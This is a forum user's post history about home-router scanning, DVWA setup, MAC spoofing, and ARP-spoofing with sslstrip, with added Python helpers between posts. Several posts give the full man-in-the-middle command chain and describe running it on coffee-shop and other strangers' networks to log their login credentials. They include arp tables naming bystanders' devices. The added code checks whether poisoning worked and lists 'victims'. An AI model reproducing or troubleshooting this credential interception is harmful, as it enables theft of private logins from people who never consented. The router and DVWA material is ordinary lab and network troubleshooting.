
michael_kent123 (Active Members, 96 posts)

Everything posted by michael_kent123

  1. I recently ran nmap -sS -p1-65365 192.168.1.1 -vv on my Zyxel router. Here are the results:

     PORT     STATE SERVICE
     21/tcp   open  ftp
     23/tcp   open  telnet
     80/tcp   open  http
     7547/tcp open  unknown

     The 7547 appears to be the CPE WAN Management Protocol (CWMP) which is this: http://www.axiros.com/knowledge-base/faqs-on-device-mgmt/cpe-wan-management-protocol-tr-069.html?no_cache=1 This does assume that 7547 isn't something else. The other ports are open because they are part of the remote management (I realise I can set these ports to something non-standard or close them on the router). However, I'm not entirely sure whether 7547 should be open (http://www.o2help.co.uk/router-close-port-7547/). Any thoughts? Thanks!
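The scan above was run from the LAN side, which only shows what the router answers to its own clients; whether 7547 (or 21, 23, 80) is reachable from the Internet is a separate question that needs a scan from outside, e.g. from a mobile connection against the public address. As an added example (editor's code, not from the post), the script below parses nmap's grepable output (-oG) and flags open management ports, recording which side the scan came from. The sample output is constructed to match the ports in the post, using the full range -p1-65535; the port-to-role table is the editor's own.

```python
import re

# Constructed sample in nmap's grepable (-oG) format, modelled on the scan in the post.
# Not real scan output: `nmap -sS -p1-65535 -oG - 192.168.1.1` produces the real thing.
SAMPLE_GREPABLE = (
    "# Nmap 6.25 scan initiated as: nmap -sS -p1-65535 -oG - 192.168.1.1\n"
    "Host: 192.168.1.1 ()\tStatus: Up\n"
    "Host: 192.168.1.1 ()\tPorts: 21/open/tcp//ftp///, 23/open/tcp//telnet///, "
    "80/open/tcp//http///, 7547/open/tcp//unknown///\tIgnored State: closed (65531)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned\n"
)

# Router management surfaces (editor's table). The risk is not that they exist but
# which side of the router answers on them: LAN-only is normal, WAN-exposed is not.
MANAGEMENT_PORTS = {
    21: "ftp (config/firmware file access)",
    22: "ssh management",
    23: "telnet management (plaintext credentials)",
    80: "http management",
    443: "https management",
    7547: "CWMP / TR-069 (ISP auto-configuration server manages the CPE)",
}

# One grepable port field: port/state/proto/owner/service/rpc/version
PORT_FIELD = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)///")


def parse_grepable(text):
    """Return {host: [(port, state, proto, service), ...]} from nmap -oG output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        host = line.split()[1]
        m = re.search(r"Ports: (.*?)(?:\t|$)", line)
        if not m:
            continue  # the "Status: Up" line carries no port list
        for port, state, proto, svc in PORT_FIELD.findall(m.group(1)):
            hosts.setdefault(host, []).append((int(port), state, proto, svc))
    return hosts


def flag_management_ports(hosts, side):
    """List open management ports; `side` is 'lan' or 'wan' depending on where nmap ran."""
    findings = []
    for host, ports in hosts.items():
        for port, state, proto, svc in ports:
            if state == "open" and port in MANAGEMENT_PORTS:
                findings.append((host, port, side, MANAGEMENT_PORTS[port]))
    return findings


if __name__ == "__main__":
    for host, port, side, what in flag_management_ports(parse_grepable(SAMPLE_GREPABLE), "lan"):
        print(f"{host}:{port} open (scanned from {side}): {what}")
```

Run the same parser over a scan of the public address taken from outside; a 7547 finding tagged "wan" is the one worth raising with the ISP, since CWMP is meant to be reachable only by the ISP's auto-configuration server.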
  2. Thanks - this is what I was looking for. Possible stupid question: I will want to connect the RJ11 to a Russian 'phone socket. Will it work? Are all sockets the same? Is there a way to find out?
  3. I plan to get a new laptop which may look something like this: http://www.pcworld.co.uk/gbuk/asus-x501u-xx039h-15-6-laptop-white-17056517-pdt.html It has an Ethernet port. Here is another example which does not have an Ethernet port: http://www.pcworld.co.uk/gbuk/asus-vivobook-s200e-c157h-11-6-touchscreen-laptop-dark-grey-18893012-pdt.html However, in both cases there is no modem (or modem port). I will need at some point to use a dial-up connection! Is there some device that will allow these types of laptop to connect to a 'phone socket (like in the old days)? If so, what would it be called? Thanks!
  4. Three photos: power port of pineapple, USB to DC cable, and an assortment of cables and suchlike. Thanks!
  5. This may seem like a basic question but I am confused about how I can connect the Mark IV to the battery pack. The Mark IV has five connection points: USB (for external storage for modules), ANT (antenna), WAN / LAN, PoE LAN (for the Ethernet connection) and PWR (for the AC Adapter). The "Pineapple Juice" battery has two connection points: USB Out and USB In (for the charger cable). What I do not understand is how I am supposed to connect the two. The manual says I need to use the "USB to DC barrel cable" which I have. Where do I plug the USB end into? Where do I plug the DC end into? Thanks!
  6. I am trying to set up Damn Vulnerable Web App (DVWA) (www.dvwa.co.uk). I install XAMPP according to these instructions successfully: http://www.apachefriends.org/en/xampp-linux.html I check that MSSQL is running under XAMPP:

     21/tcp   open  ftp      ProFTPD 1.3.4a
     80/tcp   open  http     Apache httpd 2.4.3 ((Unix) OpenSSL/1.0.1c PHP/5.4.7)
     443/tcp  open  ssl/http Apache httpd 2.4.3 ((Unix) OpenSSL/1.0.1c PHP/5.4.7)
     3306/tcp open  mysql    MySQL (unauthorized)

     I install DVWA according to these instructions: https://code.google.com/p/dvwa/wiki/README I go to localhost/dvwa and see:

     Unable to connect to the database. mysql_error()

     The /opt/lampp/htdocs/dvwa/config/config.inc.php file shows:

     $_DVWA[ 'db_server' ] = 'localhost';
     $_DVWA[ 'db_database' ] = 'dvwa';
     $_DVWA[ 'db_user' ] = 'root';
     $_DVWA[ 'db_password' ] = '';

     I am localhost (have also replaced this with 127.0.0.1 but it still did not work) and login as root. Yet I still get the above MYSQL error along with: Could not connect to the database - please check the config file. Does anyone know how I can fix this issue, thanks
  7. I don't really understand this. I thought that if you changed the MAC then the router would assume you were a different client and award you a different IP? As for this file with IP and MAC - I've asked and the only one is /proc/net/arp. Is that what you mean? Finally, the WPA networks I am connecting to are legitimate e.g. in coffee shops and suchlike. So they are designed for people like me to connect. What I do not understand is that when I connect with my real MAC there is no problem but once I spoof the MAC I can never get a connection. Whereas, with open networks, I can always connect whether spoofed or not which suggests that - for whatever reasons - WPA networks do not like spoofed MAC addresses but I have no idea why. I always make sure the MAC is a valid OUI. Thanks again - any more ideas?
  8. What do these Tor users do to attack your site? And could they not anonymise themselves through VPNs instead? VPNs are much quicker than Tor and also there are so many of them.
  9. Hi, I have been playing around with MAC spoofing on my WPA-2 network. I am confused! Here are the commands I use to change my MAC (using Ubuntu 10.04).

     sudo ifconfig wlan0 down hw ether [new MAC address]
     sudo ifconfig wlan0 up

     I use valid OUI addresses from the oui.txt file from: http://standards.iee...oui/public.html However, I cannot connect to my router with a spoofed MAC and I have tried many different OUIs. Here is what dmesg shows:

     [20604.754981] wlan0: direct probe to AP 00:14:6c:12:66:c0 (try 1)
     [20604.759226] wlan0: direct probe responded
     [20604.759240] wlan0: authenticate with AP 00:14:6c:12:66:c0 (try 1)
     [20604.766951] wlan0: authenticated
     [20604.767007] wlan0: associate with AP 00:14:6c:12:66:c0 (try 1)
     [20604.770980] wlan0: RX AssocResp from 00:14:6c:12:66:c0 (capab=0x411 status=0 aid=1)
     [20604.770997] wlan0: associated
     [20612.392073] wlan0: deauthenticating from 00:14:6c:12:66:c0 by local choice (reason=3)

     I looked up what this meant in the "IEEE Standard for Information technology — Telecommunications and information exchange between systems — Local and metropolitan area networks — Specific requirements Part 11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications" manual, specifically Table 7-22 "Reason Codes" (pages 92-93). Reason 3 is "Deauthenticated because sending STA is leaving (or has left) IBSS or ESS". What does "by local choice" for "reason=3" mean? The STA, I believe, is the client (me) but I am not mobile. Or, less often:

     [20496.710623] wlan0: deauthenticated from 00:14:6c:12:66:c0 (Reason: 15)

     Reason 15 is a "4-Way Handshake timeout". I connect in exactly the same way as I do when I connect normally (with a non-spoofed MAC). I have not set up any policies that restrict MAC addresses (there is no MAC filtering). When I re-spoof my MAC back to the 'real' MAC it immediately connects as normal. I have successfully spoofed my MAC and connected to numerous open wireless networks.
     I have also connected to a few WPA networks but have noticed that sometimes (not always) certain networks will either never allow a spoofed MAC to connect or sometimes will and sometimes will not. My router is a ZyXEL AMG1202-T10A but I don't think this matters because - as mentioned - I have successfully connected to many different networks (some with WPA) with different router types after MAC spoofing. I assume that the problem is something to do with WPA routers disliking - at times - spoofed MACs (but I do not know this). Question: while I appreciate it is impossible to give a definitive answer - why would my own router prevent me from connecting with a spoofed MAC? Thanks!
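Two things in the post above are worth having as code: the choice of spoofed address, and reading the dmesg sequence. A spoofed MAC does not have to come from oui.txt at all; setting bit 1 of the first octet marks the address as locally administered (bit 0 must stay clear, since a set bit 0 means a group/multicast address, which is never valid as a source). In the dmesg lines, "deauthenticating from ... by local choice" is logged when the client's own 802.11 stack sends the deauthentication, normally on request from wpa_supplicant, whereas "deauthenticated from ... (Reason: N)" is a deauth frame received from the AP. The block below is an added example (editor's code, not from the post): it checks and generates addresses and walks a constructed dmesg excerpt (the lines from the post) to report how far the connection got and who ended it. The reason-code table contains only the two codes the post cites.

```python
import re
import secrets

MAC_RE = re.compile(r"^[0-9a-f]{2}(:[0-9a-f]{2}){5}$")


def mac_properties(mac):
    """Decode the two flag bits of the first octet of a MAC address."""
    mac = mac.lower()
    if not MAC_RE.match(mac):
        raise ValueError(f"malformed MAC: {mac!r}")
    first = int(mac[:2], 16)
    return {
        "unicast": not (first & 0x01),               # bit 0 set = group/multicast, never valid as a source
        "locally_administered": bool(first & 0x02),  # bit 1 set = not from the IEEE OUI registry
    }


def random_local_mac():
    """Random unicast, locally administered address: no oui.txt lookup, no collision with a real vendor.

    Apply with: ip link set dev wlan0 down; ip link set dev wlan0 address <mac>; ip link set dev wlan0 up
    """
    b = bytearray(secrets.token_bytes(6))
    b[0] = (b[0] | 0x02) & 0xFE
    return ":".join(f"{x:02x}" for x in b)


# Constructed dmesg excerpts (timestamps dropped), copied from the sequences in the post.
DMESG_LOCAL_DEAUTH = [
    "wlan0: authenticate with AP 00:14:6c:12:66:c0 (try 1)",
    "wlan0: authenticated",
    "wlan0: associate with AP 00:14:6c:12:66:c0 (try 1)",
    "wlan0: RX AssocResp from 00:14:6c:12:66:c0 (capab=0x411 status=0 aid=1)",
    "wlan0: associated",
    "wlan0: deauthenticating from 00:14:6c:12:66:c0 by local choice (reason=3)",
]
DMESG_AP_DEAUTH = [
    "wlan0: authenticated",
    "wlan0: associated",
    "wlan0: deauthenticated from 00:14:6c:12:66:c0 (Reason: 15)",
]

# IEEE 802.11 Table 7-22, only the codes that appear in the post.
REASON = {3: "sending STA is leaving (or has left) IBSS or ESS", 15: "4-Way Handshake timeout"}


def connection_outcome(dmesg_lines):
    """Return (last 802.11 stage reached, who sent the deauth, reason code, reason text).

    'local' = the client's own stack sent the deauth ("by local choice", usually because
    wpa_supplicant gave up, e.g. on the key handshake); 'ap' = the AP sent the deauth frame.
    Association succeeding and a deauth following means the failure is in the WPA handshake,
    not in the MAC-level authenticate/associate steps.
    """
    stage, origin, code = None, None, None
    for line in dmesg_lines:
        if line.endswith(": authenticated"):
            stage = "authenticated"
        elif line.endswith(": associated"):
            stage = "associated"
        elif "deauthenticating from" in line:
            origin = "local"
            code = int(re.search(r"reason=(\d+)", line).group(1))
        elif "deauthenticated from" in line:
            origin = "ap"
            code = int(re.search(r"Reason: (\d+)", line).group(1))
    return stage, origin, code, REASON.get(code, "unknown")


if __name__ == "__main__":
    mac = random_local_mac()
    print(mac, mac_properties(mac))
    print(connection_outcome(DMESG_LOCAL_DEAUTH))
    print(connection_outcome(DMESG_AP_DEAUTH))
```

Both excerpts reach "associated" before the deauth, so in both cases the 802.11 authenticate/associate exchange accepted the spoofed address and the link was dropped during the WPA key handshake; wpa_supplicant's own log (run it with -d) is where to look next, since dmesg only shows the kernel's view.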
  10. I think I may be able to explain the 'what' of the situation if not the 'why'. It is based on the 'arp -a' command. I ARPspoof as follows:

      echo "1" > /proc/sys/net/ipv4/ip_forward
      iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
      arpspoof -i wlan0 [IP address of router]
      sslstrip -l 10000 [to log POST requests]

      If I issue 'arp -a' and get something like this...

      ? (10.108.0.6) at 00:50:50:d7:60:24 [ether] on wlan0

      ...then I know that no traffic is routed through me since the answer shows my connection to the router. However, if 'arp -a' provides something like this...

      ? (192.168.4.18) at 00:12:0b:32:1a:04 [ether] on wlan0
      ? (192.168.4.32) at 00:12:0d:30:18:e4 [ether] on wlan0
      ? (192.168.1.62) at 71:56:82:88:e8:f2 [ether] on wlan0
      ? (192.168.4.11) at 00:12:0a:30:20:d1 [ether] on wlan0

      ...then I know that ARPspoofing has been successful and I am the MITM. So, my question is: how do the owners of some networks prevent ARPspoofing commands from working? All of the networks where I failed to ARPspoof were 10.xxx.xxx.xxx networks. Yet I have been successful now and again on 10.xxx.xxx.xxx networks. All failures are 10.xxx.xxx.xxx networks but not all 10.xxx.xxx.xxx networks are failures. Any ideas how network owners can prevent ARPspoofing? Thanks!
  11. Thanks so much! New question: If I am the MITM and run arp -a in Ubuntu which reveals the results below then I think this signifies that all these participants are going through me. Correct?

      iPad-von-Resi.local (10.129.50.103) at b8:ff:61:0c:f1:29 [ether] on wlan0
      Leonids-iPod.local (10.129.50.105) at <incomplete> on wlan0
      ? (10.129.50.112) at <incomplete> on wlan0
      Sams-iPad-2.local (10.129.50.121) at 34:51:c9:c0:b2:3b [ether] on wlan0
      Becky-Turners-iPhone.local (10.129.50.100) at 5c:95:ae:6a:aa:d5 [ether] on wlan0
      ? (10.129.50.97) at 44:d3:ca:91:2a:48 [ether] on wlan0
      ? (10.129.50.106) at <incomplete> on wlan0
      ? (10.129.50.102) at 8c:fa:ba:95:ba:ef [ether] on wlan0
      ? (10.129.50.110) at c0:9f:42:79:7b:a3 [ether] on wlan0
      ? (10.129.50.111) at 68:a3:c4:6a:f3:26 [ether] on wlan0

      Two points: Why are some incomplete? I also suspect that iPads and iPhones act abnormally and - assuming their owners use 3G rather than wireless - this means that they are not really going through me. Does this sound OK? Thanks again!
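A quick reading of the neighbour table in the last two posts: a complete entry means this host has exchanged ARP with that address; an <incomplete> entry means the kernel sent an ARP request for it (typically because it had a forwarded packet to deliver there) and received no reply, so the device is off, out of range, or has moved to cellular. Neither proves that a host's traffic is flowing through you; a forwarded-packet count (the FORWARD chain counters in iptables -vnL, or a capture on the interface) is the real check. As an added example (editor's code, not from the post), the parser below reads `arp -a` output in the Ubuntu format shown, splits it into resolved, incomplete and off-subnet entries, and picks out the gateway's MAC so it can be compared against the value the gateway had before any poisoning started. The sample is constructed from lines in the posts above, with a gateway entry and one off-subnet address (as in post 10) added.

```python
import ipaddress
import re

# Constructed excerpt in Ubuntu `arp -a` format, built from lines in the posts above.
SAMPLE_ARP_A = """\
iPad-von-Resi.local (10.129.50.103) at b8:ff:61:0c:f1:29 [ether] on wlan0
Leonids-iPod.local (10.129.50.105) at <incomplete> on wlan0
? (10.129.50.112) at <incomplete> on wlan0
Sams-iPad-2.local (10.129.50.121) at 34:51:c9:c0:b2:3b [ether] on wlan0
_gateway (10.129.50.1) at 00:14:6c:12:66:c0 [ether] on wlan0
? (192.168.1.62) at 71:56:82:88:e8:f2 [ether] on wlan0
"""

ARP_LINE = re.compile(
    r"^(?P<name>\S+) \((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at "
    r"(?P<mac><incomplete>|[0-9a-f]{2}(?::[0-9a-f]{2}){5})(?: \[(?P<hw>\w+)\])? on (?P<iface>\S+)$"
)


def parse_arp_a(text):
    """Parse `arp -a` lines into dicts; mac is None for <incomplete> entries."""
    entries = []
    for line in text.splitlines():
        m = ARP_LINE.match(line.strip())
        if not m:
            continue  # blank lines or a format this parser does not know
        d = m.groupdict()
        d["mac"] = None if d["mac"] == "<incomplete>" else d["mac"]
        entries.append(d)
    return entries


def classify(entries, local_net, gateway_ip):
    """Split the neighbour table into the groups that matter when checking a poisoning setup.

    resolved:   hosts that answered ARP (a candidate set of victims, not proof of forwarding)
    incomplete: hosts we asked for and got nothing back (asleep, gone, or on cellular)
    off_subnet: addresses outside the interface's prefix, which deserve a second look
    """
    net = ipaddress.ip_network(local_net)
    out = {"gateway_mac": None, "resolved": [], "incomplete": [], "off_subnet": []}
    for e in entries:
        if ipaddress.ip_address(e["ip"]) not in net:
            out["off_subnet"].append(e["ip"])
        elif e["ip"] == gateway_ip:
            out["gateway_mac"] = e["mac"]
        elif e["mac"] is None:
            out["incomplete"].append(e["ip"])
        else:
            out["resolved"].append(e["ip"])
    return out


if __name__ == "__main__":
    summary = classify(parse_arp_a(SAMPLE_ARP_A), "10.129.50.0/24", "10.129.50.1")
    for k, v in summary.items():
        print(f"{k}: {v}")
```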
  12. On a related topic. What is the difference between 192.168.1.1 (which is the router address) and 192.168.1.255 (which is the broadcast address)? For example, I have always used: arpspoof -i wlan0 192.168.1.1 However, at least one commentator on the Backtrack forum suggests that, to spoof the entire network, one should use the broadcast address. What would be the difference between arpspoofing these two IPs? Thanks.
  13. I don't understand the last two comments. The whole point of SSL Strip is that it converts HTTPS sessions to HTTP sessions (at least between the MITM and the victim). The sslstrip.log file normally shows POST and SECURE POST logins and passwords. I thought that even if SSL Strip was not - for some reason - logging then the plaintext logins and passwords would show in Wireshark. Or did I misunderstand what the last two posters were saying?
  14. Some updates - and thanks for all the advice: I tried again on a network where it looks as if traffic (HTTP, SSL, etc) is flowing through me but nothing gets saved by SSL Strip. According to this article (http://torpedo48.it/hacking-tutorials/man-in-the-middle-attacks-mitm/how-to-sniff-all-network-traffic-using-https-stripping) you can view POST data (secure and not secure) in Wireshark. It says: "Login forms usually use the POST request method to send credentials to servers; using this filter you'll be able to find out all the credentials your victims inserted in the sites they visited (even the secured ones, thanks to Sslstrip!): "http.request.method == "POST""." The idea is, as I understand it, that SSL Strip will work on the MITM computer before the packets are saved by Wireshark. I tried the http.request.method == "POST" filter on a Wireshark file with 40,000 entries but found nothing. Interestingly, the sslstrip.log file did contain entries like this:

      2012-10-02 14:22:55,593 Host resolution error: [Failure instance: Traceback (failure with no frames): <class 'twisted.internet.error.DNSLookupError'>: DNS lookup failed: address 'loginsvc.world.com' not found: [Errno -5] No address associated with hostname.

      And:

      012-10-02 14:22:28,068 Resolving host: www.whatever.org.uk
      2012-10-02 14:22:28,069 Host not cached.

      This is all the log showed with the -a (all) option which normally would record a wide range of HTTP traffic. Perhaps these errors reveal something? Monitor mode: I used:

      sudo iwconfig wlan0 mode monitor

      However, I always got:

      Error for wireless request "Set Mode" (8B06) : SET failed on device wlan0 ; Device or resource busy.

      I'll try it next time with airmon-ng. I still do not understand why Wireshark shows that I am the MITM but SSLStrip will not log anything.
  15. I do not think I have explained myself well. The issue is nothing to do with Wireshark. I am only using Wireshark to see what traffic is going through me when I am MITM. sslstrip (http://www.thoughtcrime.org/software/sslstrip/) should log everything when I use its -a option. Often it works but - in the two experiences I provided in the original post - it will not log anything even though I am MITM.
  16. I am trying to log all traffic not a specific site. With arpspoof -i wlan0 [IP address of router] I should be the MITM for all traffic on the network which uses that router. I always use sudo wireshark but all traffic is saved with sslstrip and the -a option. I am using a physical machine. The wireless adapter (wlan0) is Atheros Communications Inc. AR928X Wireless Network Adapter (PCI-Express) (rev 01). I have been successful on many occasions so I do not see how the issue is at my end. Thanks again!
  17. I am having some interesting experiences while ARPspoofing and using SSLStrip. There's a couple of things I just cannot make sense of. I have watched the Hak 5 videos about this topic which is why I hope that this forum is an appropriate place to post. I'm not doing this for malicious purposes - I'm just curious that's all and have spent many hours trying to figure out my problem with zero success. Here's what I do. Connect to the network.

      su root
      echo "1" > /proc/sys/net/ipv4/ip_forward
      iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
      arpspoof -i wlan0 192.168.x.x [based on route -n]
      sslstrip -a -l 10000 [the -a option logs all traffic not just POST requests]

      This often works fine but sometimes there are problems. There are two issues (which may or may not be interconnected). First: I ARPspoof the network as described above. However, my Wireshark logs do not reveal that any HTTP, TCP, or TLS traffic is going through me. I obviously should be the MITM. I can see that I am telling everyone that I am the router with my ARP commands. But no content is going through me. I can observe lots of people nearby in the room doing various things that would generate traffic. And I am using the -a option so everything should be logged. But the log file stays at 0 bytes. Why is nothing going through me? I could understand if the network was empty but it isn't as within a few minutes the Wireshark file has tens of thousands of entries. Second: This is more common than the above. The Wireshark logs do show DNS, HTTP, TCP, and TLS traffic but, once again, the log file stays at 0 bytes. I can see that, this time, traffic is flowing through me and I really do appear to be a MITM. But, in reality, no traffic is ever being recorded. The point is that I am forcing traffic through me so the ARP commands are effective. But nothing is saved. I have the Wireshark logs so if anyone has a specific question I can certainly refer to them.
      Many thanks - I am so confused about this and would really like to learn.